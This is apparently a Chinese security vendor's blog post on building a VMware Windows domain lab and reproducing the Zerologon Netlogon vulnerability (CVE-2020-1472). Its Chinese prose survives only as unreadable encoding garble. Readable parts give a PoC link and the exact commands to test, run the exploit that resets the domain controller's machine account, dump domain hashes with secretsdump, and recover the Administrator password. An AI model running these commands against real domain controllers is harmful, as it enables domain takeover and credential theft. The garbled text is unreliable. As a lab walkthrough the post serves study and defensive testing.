• Ìá½»ÐèÇó
    *
    *

    *
    *
    *
    Á¢¼´Ìá½»
    µã»÷¡±Á¢¼´Ìá½»¡±£¬±íÃ÷ÎÒÀí½â²¢Í¬Òâ ¡¶»Æ½ð³Ç¿Æ¼¼Òþ˽Ìõ¿î¡·

    logo

      ²úÆ·Óë·þÎñ
      ½â¾ö·½°¸
      ¼¼ÊõÖ§³Ö
      ºÏ×÷·¢Õ¹
      ¹ØÓڻƽð³Ç

      ÉêÇëÊÔÓÃ
        VMwareÓò»·¾³´î½¨¼°Netlogon©¶´¸´ÏÖ
        ·¢²¼Ê±¼ä£º2021-04-09 ÔĶÁ´ÎÊý£º 410 ´Î

        ϵͳ»·¾³



        1.windows server 2012 r2£¨Óò¿ØÖÆÆ÷£©

        2.windows server 2008 r2£¨ÓòÄÚ·þÎñÆ÷£©

        3.windows 7£¨ÓòÄÚÆÕͨÖ÷»ú£©


        2

        ´î½¨Óò»·¾³


        1¡¢ÍøÂç»·¾³ÅäÖÃ


        ÔÚVMwareÖа²×°ºÃwin7¡¢win2008ºÍwin2012£¬È»ºóµÚÒ»²½ÊǽøÐÐÍøÂçÅäÖã¬ÓÉÓÚÊÇÒª´î½¨Óò»·¾³£¬ËùÒÔÓò¿ØÖÆÆ÷ÐèҪʹÓù̶¨µÄ¾²Ì¬ip£¬ÔÚÕâÀïÓòÄÚµÄÈý̨»úÆ÷ΪÁË·½±ã¶¼ÉèÖÃΪ¹Ì¶¨ip¡£


        ½«Èý̨»úÆ÷µÄÍø¿¨¶¼ÉèÖÃΪNAT£¬½øÈëÐéÄâÍøÂç±à¼­Æ÷£¬½«DHCPµÄÑ¡ÖÐÈ¥µô¡£È»ºóµã»÷NATÉèÖã¬ÉèÖÃÍø¹Ø¡£´Ë´¦ÉèÖãº


        꿦룼192.168.154.0

        Íø¹Ø£º192.168.154.1

        ×ÓÍøÑÚÂ룺255.255.255.0




        Óò¿ØÖ÷»ú£¨192.168.154.30£©ÍøÂçÉèÖãº

        ip£º192.168.154.30

        ×ÓÍøÑÚÂ룺255.255.255.0

        Íø¹Ø£º192.168.154.1

        DNS£º192.168.154.30


        Win2008£¨192.168.154.20£©ÍøÂçÉèÖãº

        ip£º192.168.154.20

        ×ÓÍøÑÚÂ룺255.255.255.0

        Íø¹Ø£º192.168.154.1

        DNS£º192.168.154.30




        Win7£¨192.168.154.10£©ÍøÂçÉèÖãº

        ip£º192.168.154.10

        ×ÓÍøÑÚÂ룺255.255.255.0

        Íø¹Ø£º192.168.154.1

        DNS£º192.168.154.30




        2¡¢Óò¿Ø¼°DNS·þÎñÆ÷£¨192.168.154.30£©°²×°


        ´ò¿ª·þÎñÆ÷¹ÜÀíÆ÷£¬µã»÷Ìí¼Ó½ÇÉ«ºÍ¹¦ÄÜ




        ¹´Ñ¡ADÓò·þÎñºÍDNS·þÎñÆ÷


        Ò»Ö±ÏÂÒ»²½£¬µã»÷°²×°




        °²×°Íê³Éºó£¬ÐèÒª½«·þÎñÆ÷ÌáÉýΪÓò¿ØÖÆÆ÷


        Ìí¼ÓÒ»¸öÐÂÁÖ£¬¸ùÓòÃûΪdomore.me


        ÊäÈëĿ¼»¹Ô­ÃÜÂ룬ÏÂÒ»²½


        Ò»Ö±ÏÂÒ»²½£¬µã»÷°²×°£¬µÈ´ý°²×°Íê³É×Ô¶¯ÖØÆô£¨Èç¹û°²×°³öÏÖ´íÎ󣬿ÉÔÚDNSÑ¡ÏîÈ¥µôDNSίÅɵĹ´Ñ¡£©


        3¡¢Ö÷»úÈëÓò


        µÈ´ýÓò¿ØÖÆÆ÷°²×°ÖØÆôÍê³Éºó£¬ÔÚ192.168.154.10ºÍ192.168.154.20Á½Ì¨Ö÷»úÉÏʹÓÃpingÃüÁîºÍnslookupÃüÁî²é¿´ÊÇ·ñÄÜÁ¬Í¨domore.meÓò¡£


        Á¬Í¨Ã»ÓÐÎÊÌâºó£¬ÔÚ¿ØÖÆÃæ°å->ϵͳºÍ»Æ½ð³Ç¹ÙÍø->ϵͳ->¸ü¸ÄÉèÖÃÖÐÉèÖÃÖ÷»úµÄÓòΪdomore.me


        ³É¹¦ÈëÓò


        4¡¢´´½¨ÓòÕË»§


        µÇ¼Óò¿ØÖÆÆ÷£¬´´½¨Ò»¸öÓòÓû§


        ÉèÖÃÒ»¸öÇ¿ÃÜÂë1QAZ2wsx@?!


        ʹÓÃÓòÕË»§µÇ¼Ö÷»ú192.168.154.10


        ÖÁ´Ë£¬Ò»¸ö¼òµ¥µÄÓò»·¾³´î½¨Íê³É¡£


        3

        Netlogon©¶´¸´ÏÖ


        1¡¢Â©¶´¼ò½é


        NetlogonЭÒéÊÇ΢ÈíÌṩµÄÒ»Ì×Óò·ÃÎÊÈÏ֤ЭÒé¡£CVE-2020-1472ÊÇÒ»¸öwindowsÓò¿ØÖÐÑÏÖØµÄÔ¶³ÌȨÏÞÌáÉý©¶´£¬ÓÉÓÚ΢ÈíÔÚNetlogonЭÒéÖÐûÓÐÕýȷʹÓüÓÃÜËã·¨¶øµ¼ÖµÄ©¶´£¬Î¢ÈíÔÚ½øÐÐAES¼ÓÃÜÔËËã¹ý³ÌÖУ¬Ê¹ÓÃÁËAES-CFB8ģʽ²¢ÇÒ´íÎóµÄ½«IVÉèÖÃΪȫÁ㣬ÕâʹµÃ¹¥»÷ÕßÔÚÃ÷ÎÄ(client challenge)¡¢IVµÈÒªËØ¿É¿ØµÄÇé¿öÏ£¬´æÔڽϸ߸ÅÂÊʹµÃ²úÉúµÄÃÜÎÄΪȫÁã¡£


        2¡¢Â©¶´¸´ÏÖ


        Ê×ÏȲ鿴Óò¿ØÖÆÆ÷£¬Netlogon·þÎñÕýÔÚÔËÐÐ


        ±à¼­kaliµÄÍøÂçÁ¬½Ó£¬Ê¹ÆäÄÜÁ¬Í¨Óò¿ØÖÆÆ÷


        Poc¼°EXPÁ´½Ó£ºhttps://github.com/De4dCr0w/Vulnerability-analyze/tree/master/Zerologon-CVE-2020-1472

        PS£ºÕâÀï×¢ÒâÏÈpip3 install -r requirements.txt£¬pip3 install impacketÒ»ÏÂ

        ÔËÐÐpoc¼ì²â½Å±¾

        python3 zerologon_tester.py WIN-SHSMTK6HJCK 192.168.154.30£¬WIN-SHSMTK6HJCKΪÓò¿ØÖ÷»úÃû£¬192.168.154.30ΪÓò¿ØipµØÖ·


        Ö´ÐÐexp֮ǰÔËÐÐÒ»´Î»ñÈ¡hashµÄ½Å±¾

        python3 secretsdump.py domore.me/WIN-SHSMTK6HJCK$@192.168.154.30 -just-dc -hashes :£¬·¢ÏÖ»ñȡʧ°Ü


        ÐÐexp£ºpython3 CVE-2020-1472.py WIN-SHSMTK6HJCK WIN-SHSMTK6HJCK$ 192.168.154.30


        ÔÙ´ÎÖ´ÐлñÈ¡hash½Å±¾£¬³É¹¦¡£


        ½âÒ»ÏÂÓò¿ØAdministratorÕË»§µÄhash£¬Win2012@test£¬³É¹¦¡£

        Ãâ·ÑÊÔÓÃ
        ·þÎñÈÈÏß

        ÂíÉÏ×Éѯ

        400-811-3777

        »Øµ½¶¥²¿
        ¡¾ÍøÕ¾µØÍ¼¡¿¡¾sitemap¡¿